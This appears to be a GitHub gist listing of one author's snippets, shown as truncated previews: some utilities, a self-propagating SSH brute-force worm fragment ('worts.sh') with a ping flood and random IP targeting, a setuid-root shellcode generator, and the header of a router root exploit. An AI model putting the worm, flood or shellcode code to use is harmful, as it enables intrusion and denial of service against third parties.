Probably breaking your code.

Mark Stealer Whitehall oxagast

oxagast / nosecandy.c
Created January 20, 2016 23:04
nose candy
#include "stdio.h"
#include "string.h"
/*
 * Write the byte `was` to standard output as one character.
 * `expected` is accepted for the caller's benefit but is not read here.
 */
void test_op(unsigned char was, unsigned char expected) {
    (void)expected; /* parameter intentionally unused */
    putchar(was);
}
int main(int argc, char *argv[]) {
if ((argc > 1) && (argc < 3)) {
char ui[10];
for (int uia=0; uia<6; uia++) {
ui[uia] = argv[1][uia];
oxagast / magicsquare.cpp
Last active June 30, 2016 16:37
magic square
// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)
// magic square
#include <algorithm>
#include <cstdlib>
#include <cstring>
#include <iostream>
# Look up a vendor string for every MAC address in the local ARP table through
# a third-party web page, then print the IP list followed by the vendor list.
# NOTE(review): each MAC address seen on the local segment is sent to
# www.adminsub.net, and all scratch files use fixed names in the current
# directory. Run it from a private directory, and only where disclosing that
# hardware inventory to an outside service is acceptable.
# Remove a stale scratch file from an earlier run; errors are silenced.
rm page_part 2>/dev/null;
# Strip everything up to "ether" and everything from " C" onward from arp's
# output, keep the lines containing ':' (the hardware addresses), and fetch one
# lookup page per address. Of the "Vendor" line and the line after it, only
# lines mentioning "google" are kept.
# NOTE(review): presumably the page wraps the vendor name in a search link;
# this depends on the site's markup and should be confirmed.
arp | sed -e 's/.*ether[[:space:]]*//' -e 's/ C.*//' | grep : | xargs -I {XXX} curl -s https://www.adminsub.net/mac-address-finder/{XXX} | grep Vendor -A 1 | grep google > page_part;
# Cut the vendor text out of the saved markup (fifth '='-separated field, up to
# the next double quote), then save the first column of `arp -n`.
# NOTE(review): the first `arp -n` in the pipe is redundant; arp does not read
# standard input, so only the second one's output reaches cut.
cat page_part | cut -d '=' -f 5 | cut -d '"' -f 1 > macs_resolved && arp -n | arp -n | cut -f 1 -d ' ' > ips_tomac;
# Keep all but the first line of ips_tomac (the column header).
tail -n $(echo `cat ips_tomac | wc -l`-1 | bc) ips_tomac > ips_tomac2;
# Print both lists with line numbers and store them in ./resolved, IPs first.
# NOTE(review): an IP is matched to a vendor only by line number, so this
# assumes both lists have the same length and order; nothing here enforces it.
cat ips_tomac2 -n | tee resolved && cat macs_resolved -n | tee -a resolved;
# Delete the scratch files; ./resolved is left behind as the result.
rm ips_tomac ips_tomac2 macs_resolved page_part
### godmode by oxagast ###
# Generates a small C program that calls setuid(0) and then runs /bin/sh,
# compiles it, and prints the instruction bytes objdump reports for the
# resulting file as a C `char shellcode[] = "...";` initializer.
# NOTE(review): the generated program does not check setuid()'s return value,
# so the shell is started even when the UID change is refused.
# NOTE(review): sc.c, godmode and s.tmp are written with fixed names in the
# current directory, and gcc's exit status is never checked.
echo '#include <unistd.h>' > sc.c;
echo 'int main(void) {setuid(0);execlp("/bin/sh", "sh", NULL);}' >> sc.c;
gcc sc.c -o godmode;
# Take objdump's disassembly of the whole file, keep the raw-byte column (the
# text after the first ':' trimmed to 21 characters, minus its first
# character), put one byte per line, prefix each with \x, and join them.
# NOTE(review): the fixed column widths assume objdump's layout for the build
# architecture; confirm before relying on the output.
SHELLCODE=$(objdump --show-raw-insn -d godmode | grep -v "file format" | cut -f 2 -d ':' | cut -c -21 | cut -c 2- | sed -e 's/ /\n/g' | grep -v "^$" | sed -e 's/^/\\x/' | tr -d "\n")
echo -n "char shellcode[] = "
# Wrap the escaped bytes into quoted string-literal lines through s.tmp: the
# first line is cut at 60 characters, later lines at 80, and the final byte of
# the output is dropped by `head -c -1`.
echo $SHELLCODE | sed -e 's/\(.\{60\}\)/\1\n/' | head -n 1 > s.tmp; echo $SHELLCODE | sed -e 's/^\n//' | sed -e 's/\(.\{80\}\)/\1\n/g' | sed -e 's/.*\"/ \"/' >> s.tmp; cat s.tmp | sed -e 's/^\\/"\\/' -e 's/$/\"/' | head -c -1
echo ";";
# NOTE(review): s.tmp is not removed here and stays in the current directory.
rm sc.c godmode;
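#!/bin/bash
# Guard wrapper for git: refuses to run any git command while a file under the
# current directory starts with a PEM RSA private-key header, so that a key is
# not committed by accident. Install it with:
# alias "git"='~/.git_check_rsa.sh'
#
# Exit status: 1 when such a file is found, otherwise git's own exit status.
# Limits: only the first line of each file is inspected and only the
# "RSA PRIVATE KEY" header is recognised; other private-key formats, and keys
# embedded further down a file, are not detected.
key_header='-----BEGIN RSA PRIVATE KEY-----'
key_file=''
# NUL-delimited names keep paths with spaces, quotes or newlines intact.
while IFS= read -r -d '' candidate; do
    first_line=''
    # Read at most 64 characters of the first line: enough for the header, and
    # it bounds memory use on large files without newlines. Unreadable files
    # are skipped silently.
    { IFS= read -r -n 64 first_line < "$candidate"; } 2>/dev/null
    # Strip a trailing CR so CRLF-encoded key files are caught too.
    if [ "${first_line%$'\r'}" == "$key_header" ]; then
        key_file=$candidate
        break
    fi
done < <(find . -type f -print0 2>/dev/null)

if [ -n "$key_file" ]; then
    echo RSA KEY FOUND!;
    echo Not adding to git.;
    # Name the file on stderr so the user knows what to move or ignore.
    echo "Offending file: $key_file" >&2
    exit 1;
else
    # "$@" must be quoted so arguments containing spaces (commit messages,
    # paths) reach git as single arguments.
    git "$@"
fi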
oxagast / github_rd.sh
Last active March 24, 2017 13:53
Get the total number of GitHub release downloads over all time for a project
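# Print the total download count across the releases of one GitHub project.
# REPO and GITUSER select the project; the total is the sum of every
# download_count value in the releases API response.
REPO=ansvif; GITUSER=oxagast
# -f turns HTTP errors (rate limiting, unknown repository) into a failure
# instead of an empty sum. per_page=100 is the largest page the API serves, so
# a project with more releases than that is still under-counted.
if ! releases=$(curl -fsS "https://api.github.com/repos/$GITUSER/$REPO/releases?per_page=100"); then
    echo "Could not fetch release data for $GITUSER/$REPO." >&2
    exit 1
fi
# awk adds up the values and prints 0 when the project has no releases.
total=$(printf '%s\n' "$releases" | grep download_count | sed -e 's/.*: //' -e 's/,//' | awk '{ sum += $1 } END { print sum + 0 }')
# The figure is release-asset downloads, not repository clones.
echo "$total All time release downloads of $REPO."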
oxagast / .screenrc
Last active April 27, 2017 20:36
Screen Settings
# GNU screen settings.
# Skip the copyright/splash page shown when screen starts.
startup_message off
# Disabled setting: it would run screen's lockscreen command after 1800 seconds
# without input. While it stays commented out, screen never locks an
# unattended session on its own.
#idle 1800 lockscreen
# Use the audible bell rather than the visual one.
vbell off
# Show status messages for 2 seconds.
msgwait 2
# New windows keep 15000 lines of scrollback. Anything printed to the terminal,
# including secrets echoed by commands, stays readable in that history.
defscrollback 15000
# New windows default to UTF-8.
defutf8 on
# Program started in each new window.
shell bash
# Window title: the text after "$ " on the prompt line, with "bash" as default.
shelltitle "$ |bash"
# Prefix + '/': clear the screen and discard the window's scrollback by setting
# it to 0 lines and then restoring the 15000-line limit.
bind '/' eval "clear" "scrollback 0" "scrollback 15000"
# Prefix + '=': make all regions the same size.
bind = resize =
oxagast / worts.sh
Created November 15, 2017 07:03
Bruteforce random SSH servers and propagate.
#!/bin/bash
dnf install tor torsocks expect -y; apt-get install tor torsocks expect build-essential -y; systemctl start tor &
werm=$(cat $0 | base64 -w 0);
pound='8.8.8.8';
while [ 1 ];
do
ip_address=$(dd if=/dev/urandom bs=4 count=1 2>/dev/null | od -An -tu1 | sed -e 's/^ *//' -e 's/ */./g')
ping $pound -f -c 10000 &
wget $pound &
servers_addresses=( $ip_address )
# bermise_fuzz
# oxagast
# Opening set-up lines of a fuzzing script that takes the path of the target
# binary as its first argument.
# NOTE(review): the rest of the script is not visible here, so the roles of
# mupr and randchars are left undocumented.
mupr="64";
# Number of lines in /var/log/syslog that already mention "traps:" or
# "segfault". Presumably a baseline for spotting new crashes later; confirm
# against the rest of the script.
syslog_crashes=$(grep "traps:\|segfault" /var/log/syslog -c);
# Path of the program under test, as given on the command line.
binname="$1";
# Last '/'-separated component of that path, i.e. the file name.
# NOTE(review): $binname is expanded unquoted here and in the echo below, so a
# path containing spaces or glob characters is word-split and expanded.
binshort=$(echo $binname | awk -F "/" '{print $NF}')
echo fuzzing $binname;
randchars=1;
oxagast / pk5001z00pin.c
Last active May 6, 2018 16:15
Remote root Exploit for PK5001Z CenturyLink Routers.
/* PK5001Z CenturyLink Router/Modem remote root exploit */
/* oxagast / Marshall Whittaker */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */
/* PK5001Z CenturyLink Router remote root 0day */
/* Enjoy! */
/* --oxagast */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */
/* */
/* # uname -a; id; */